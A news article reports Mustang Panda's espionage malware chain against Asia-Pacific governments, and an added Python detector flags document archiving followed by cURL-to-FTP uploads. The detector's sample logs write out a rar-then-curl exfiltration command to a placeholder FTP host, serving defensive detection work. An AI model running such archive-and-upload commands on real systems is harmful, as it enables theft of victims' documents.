Mustang Panda Employs Advanced Malware for Surveillance of Asia-Pacific Governments
The threat actor known as Mustang Panda has expanded its malware arsenal with new tools that streamline data exfiltration and the launch of next-stage payloads, according to recent findings from Trend Micro.
The cybersecurity company, which tracks the activity cluster under the name Earth Preta, said it observed “the dissemination of PUBLOAD through a variation of the worm HIUPAN.”
PUBLOAD is a known downloader malware that has been linked to Mustang Panda since early 2022 and used in cyber attacks against government entities in the Asia-Pacific (APAC) region to deliver the PlugX malware.
“PUBLOAD was also utilized to insert auxiliary utilities into the targets’ framework, like FDMTP to function as an additional management tool, which displayed responsibilities akin to PUBLOAD; and PTSOCKET, a utility exploited as a substitute exfiltration choice,” said security researchers Lenart Bermejo, Sunny Lu, and Ted Lee.
Mustang Panda’s use of removable drives as a propagation medium for HIUPAN was previously documented by Trend Micro in March 2023. The worm is tracked by Google-owned Mandiant as MISTCLOAK and has been observed in connection with a cyber espionage campaign targeting the Philippines that may have begun as early as September 2021.
PUBLOAD is equipped with capabilities to conduct reconnaissance on the infected network and collect files of interest (.doc, .docx, .xls, .xlsx, .pdf, .ppt, and .pptx). It also serves as a conduit for a new hacking tool named FDMTP, a “rudimentary malware downloader” implemented on top of TouchSocket over Duplex Message Transport Protocol (DMTP).
The collected data is compressed into a RAR archive and sent to an attacker-controlled FTP server using cURL. Alternatively, Mustang Panda has also been observed deploying a custom tool called PTSOCKET that can transfer files in multi-threaded mode.
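The staging-and-exfiltration chain described above (documents of the listed types swept into a RAR archive, then pushed to an FTP server with cURL) is one that defenders can look for in endpoint process-creation telemetry. The Python below is an added example written for this article, not code from Trend Micro or from the page; it assumes a constructed `host|parent_image|image|command_line` record format, and every log line, hostname, path and IP address in it is made up for the example. It flags each half of the chain separately and then correlates them per host and parent process, since an archiving step followed by an FTP upload from the same parent is a much stronger signal than either alone.

```python
"""Detect the document-archive-then-cURL-to-FTP staging pattern in process logs.
Log format, sample records, and tool names are constructed for this example."""
from dataclasses import dataclass

# File types the article says PUBLOAD collects.
TARGET_EXTS = {".doc", ".docx", ".xls", ".xlsx", ".pdf", ".ppt", ".pptx"}
ARCHIVE_EXTS = {".rar", ".zip", ".7z"}
CURL_IMAGES = {"curl", "curl.exe"}
RAR_IMAGES = {"rar", "rar.exe", "winrar.exe"}

# Constructed sample telemetry: host|parent_image|image|command_line
SAMPLE_LOGS = [
    "ws01|svchost.exe|C:\\Windows\\System32\\svchost.exe|svchost.exe -k netsvcs",
    "ws01|update.exe|C:\\Users\\Public\\rar.exe|rar.exe a -r C:\\Users\\Public\\out.rar "
    "C:\\Users\\*\\Documents\\*.docx C:\\Users\\*\\Documents\\*.pdf C:\\Users\\*\\Documents\\*.xlsx",
    "ws01|update.exe|C:\\Users\\Public\\curl.exe|curl.exe -s -T C:\\Users\\Public\\out.rar "
    "ftp://203.0.113.10/upload/ -u user:pass",
    "ws02|cmd.exe|C:\\Windows\\System32\\curl.exe|curl.exe -O https://example.invalid/tool.zip",
    "ws03|explorer.exe|C:\\Program Files\\WinRAR\\WinRAR.exe|WinRAR.exe a backup.rar photos\\*.jpg",
]


@dataclass
class Finding:
    host: str
    parent: str
    kind: str      # "archive" or "exfil"
    reason: str
    cmdline: str


def parse_line(line):
    """Split one record into host, parent image, image basename (lowercased), command line."""
    host, parent, image, cmd = line.split("|", 3)
    basename = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return host, parent, basename, cmd


def ext_of(token):
    """Lowercased extension of a path or wildcard token ('' if none)."""
    token = token.strip('"').lower()
    dot = token.rfind(".")
    return token[dot:] if dot != -1 else ""


def inspect_curl(args):
    """Return (kind, reason) if curl is uploading a file to an FTP/FTPS URL."""
    upload, url = None, None
    for i, a in enumerate(args):
        if a in ("-T", "--upload-file") and i + 1 < len(args):
            upload = args[i + 1]
        elif a.startswith(("ftp://", "ftps://")):
            url = a
    if upload and url:
        what = "archive" if ext_of(upload) in ARCHIVE_EXTS else "file"
        return "exfil", f"{what} {upload} uploaded via cURL to {url}"
    return None


def inspect_rar(args):
    """Return (kind, reason) if a rar 'a' (add) command sweeps up the targeted document types."""
    if not args or args[0].lower() != "a":
        return None
    hit = sorted({ext_of(a) for a in args[1:]} & TARGET_EXTS)
    if len(hit) >= 2:
        return "archive", "rar archive built from document types " + ", ".join(hit)
    return None


def analyze(lines):
    """Flag archiving and FTP-upload events. Uses plain whitespace splitting, so
    quoted paths containing spaces would need a real tokenizer in production."""
    findings = []
    for line in lines:
        host, parent, image, cmd = parse_line(line)
        args = cmd.split()[1:]  # drop argv[0]
        result = None
        if image in CURL_IMAGES:
            result = inspect_curl(args)
        elif image in RAR_IMAGES:
            result = inspect_rar(args)
        if result:
            findings.append(Finding(host, parent, result[0], result[1], cmd))
    return findings


def correlate(findings):
    """(host, parent) pairs where the same parent both built an archive and shipped it over FTP."""
    seen = {}
    for f in findings:
        seen.setdefault((f.host, f.parent), set()).add(f.kind)
    return sorted(k for k, kinds in seen.items() if kinds == {"archive", "exfil"})


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOGS):
        print(f"{f.host} [{f.parent}] {f.kind}: {f.reason}")
    print("correlated:", correlate(SAMPLE_LOGS and analyze(SAMPLE_LOGS)))
```

In the constructed sample, only `ws01` triggers both halves from the same parent (`update.exe`); the routine `https` download on `ws02` and the photo backup on `ws03` are not flagged, which is the point of keying the archive check on the document types named in the report rather than on any RAR activity.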
Furthermore, Trend Micro has attributed to the adversary an “agile” spear-phishing campaign identified in June 2024 that delivered email messages carrying a .url attachment which, when opened, is used to deploy a digitally signed downloader named DOWNBAIT.
The campaign is believed to have targeted Myanmar, the Philippines, Vietnam, Singapore, Cambodia, and Taiwan, based on the filenames and content of the decoy documents used.
DOWNBAIT acts as a first-stage loader used to retrieve and execute the PULLBAIT shellcode in memory, which in turn downloads and runs the first-stage backdoor known as CBROVER.

The implant, for its part, supports file download and remote shell execution capabilities, in addition to serving as a conduit for delivering the PlugX remote access trojan (RAT). PlugX, in turn, takes care of deploying another bespoke file collector referred to as FILESAC for gathering the victim’s documents.
The disclosure comes as Palo Alto Networks Unit 42 detailed Mustang Panda’s abuse of Visual Studio Code’s embedded reverse shell feature to gain a foothold in target networks, indicating that the actor is actively adapting its modus operandi.
“Earth Preta has showcased substantial improvements in their malware deployment and methodologies, particularly in their initiatives intended for governmental bodies,” the researchers said. “The group has transformed their strategies, […] harnessing multi-stage downloaders (from DOWNBAIT to PlugX) and potentially leveraging Microsoft’s cloud services for information exfiltration.”